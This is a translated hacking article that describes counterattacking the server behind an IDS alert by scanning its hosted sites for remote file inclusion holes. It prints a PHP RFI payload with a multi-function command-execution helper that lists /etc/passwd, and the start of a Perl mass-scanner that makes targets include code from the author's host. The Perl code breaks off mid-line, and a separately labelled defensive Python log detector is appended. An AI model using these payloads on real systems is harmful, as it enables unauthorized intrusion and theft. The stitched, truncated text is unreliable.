From: Tiger

I. Cause

One day the IDS raised an alert: Apache was under attack. The attack did not succeed, but I could not leave it at that. I had to see which kind of 'fairy' dared to stir up trouble on my turf.

II. Counterattack

A scan of the source IP showed that only ports 22 and 80 were open. So the other side is also a web server, and most likely a stepping stone. In any case, take it first! A web server usually hosts multiple virtual sites, which makes it hard to ensure that the code of every website is secure. For a server with many websites, getting a webshell is therefore almost easy.

1. Spying

Google is of course used for gathering information about the websites. First go to www.myipneighbors.com and query the domain names that correspond to the server's IP address; then search Google for inurl:domain.com and check the resulting pages one by one. But there were too many domain names on this IP address. Judging by the attack method used from that IP address, it seemed to be looking for RFI (remote file include) vulnerabilities. OK. If this server is a stepping stone, it may itself have been compromised through an RFI vulnerability. So let's start with RFI. Put all of the server's URLs collected through Google into a text file; then these links can be tested quickly with a program. Enough talk, on to the code:

1. rfi.txt

This is actually PHP code. You can use it to test whether a PHP script on the target website will execute it.

    <?php
    // Uses PHP's unpack function: if 2a73637266621374392a is output on the page, the PHP code was executed!
    $pcode = unpack("H*", "*scrfcxt9*");
    echo $pcode[1];
    // phpinfo();
    echo "<br>";
    // Run the command ls /et*/pas*d. If /etc/passwd is returned, the PHP code can execute system commands.
    echo execute("ls /et*/pas*d");

    // The phpspy code is used here, as I am too lazy to write my own.
    // It is a function that tries PHP's command-execution functions one by one.
    // If any function succeeds, it is used for execution.
    function execute($cfe) {
        $res = '';
        if ($cfe) {
            if (function_exists('exec')) {
                @exec($cfe, $res);
                $res = join("", $res);
            } elseif (function_exists('shell_exec')) {
                $res = @shell_exec($cfe);
            } elseif (function_exists('system')) {
                @ob_start();
                @system($cfe);
                $res = @ob_get_contents();
                @ob_end_clean();
            } elseif (function_exists('passthru')) {
                @ob_start();
                @passthru($cfe);
                $res = @ob_get_contents();
                @ob_end_clean();
            } elseif (@is_resource($f = @popen($cfe, "r"))) {
                $res = '';
                while (!@feof($f)) {
                    $res .= @fread($f, 1024);
                }
                @pclose($f);
            }
        }
        return $res;
    }
    ?>

2. rfiscan.pl

This is a batch detection script that lets you quickly locate vulnerable URLs.

    #!/usr/bin/perl -w
    use LWP::Simple;            # use LWP to fetch the URL content and check it
    use Parallel::ForkManager;  # use ForkManager for fast parallel execution
    $| = 1;
    my $urlfile = shift || die "need list!";
    my @urllist;
    my $Forkno = 100;
    my $count = 0;
    # Set remote file inclusion location
    my $phpurl = 'http://www.mysite.com/rfc.txt?';
    my $stime = time;
    # Open a URL list file
    open(URLL, "$urlfile" |
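The RFI probing this article starts from (an IDS alert on Apache, with a remote URL ending in `?` passed in a request parameter) can be picked out of the web server's own access log. The following is an added example, not part of the original article: the log lines, IP addresses and host names are constructed, and the names `find_rfi_probes` and `summarize` are hypothetical.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample in Apache combined log format (documentation IPs, example hosts).
SAMPLE_LOG = """\
198.51.100.7 - - [10/Oct/2008:13:55:36 +0800] "GET /index.php?page=http://www.example.net/rfi.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
198.51.100.7 - - [10/Oct/2008:13:55:37 +0800] "GET /news.php?inc=hTTp%3A%2F%2Fwww.example.net%2Frfi.txt%3F&id=3 HTTP/1.1" 404 209 "-" "libwww-perl/5.805"
203.0.113.9 - - [10/Oct/2008:13:56:01 +0800] "GET /go.php?url=http://www.example.org/about.html HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2008:13:56:02 +0800] "GET /index.php?page=contact HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# Captures: client IP, request target, response status.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3}) ')
REMOTE_URL = re.compile(r'^(?:https?|ftps?)://', re.IGNORECASE)

def find_rfi_probes(log_text):
    """Return (client_ip, parameter, status, confidence) for each parameter carrying a remote URL."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line in the expected format
        ip, target, status = m.group(1), m.group(2), int(m.group(3))
        # parse_qsl percent-decodes, so "http%3A%2F%2F..." is caught as well.
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            if not REMOTE_URL.match(value.strip()):
                continue
            # A trailing "?" turns whatever suffix the include() appends into a
            # query string; ordinary link or redirect parameters rarely end that way.
            confidence = "high" if value.rstrip().endswith("?") else "low"
            hits.append((ip, name, status, confidence))
    return hits

def summarize(hits):
    """Group high-confidence hits: client IP -> set of probed parameter names."""
    by_ip = {}
    for ip, name, _status, confidence in hits:
        if confidence == "high":
            by_ip.setdefault(ip, set()).add(name)
    return by_ip

if __name__ == "__main__":
    for hit in find_rfi_probes(SAMPLE_LOG):
        print(hit)
```

A high-confidence hit answered with status 200 is the one to review first, since the page was served with the probe parameter in place. On the PHP side, `allow_url_include = Off` (the default since PHP 5.2) keeps `include()` from fetching such URLs at all.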